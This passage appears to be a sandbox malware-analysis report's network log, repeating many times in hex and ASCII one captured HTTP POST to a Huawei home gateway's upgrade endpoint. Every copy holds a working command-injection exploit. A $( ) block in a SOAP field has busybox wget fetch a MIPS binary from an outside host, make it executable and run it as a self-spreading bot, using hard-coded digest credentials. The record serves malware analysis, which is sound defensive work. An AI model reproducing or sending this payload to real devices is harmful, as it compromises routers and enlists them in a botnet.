70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 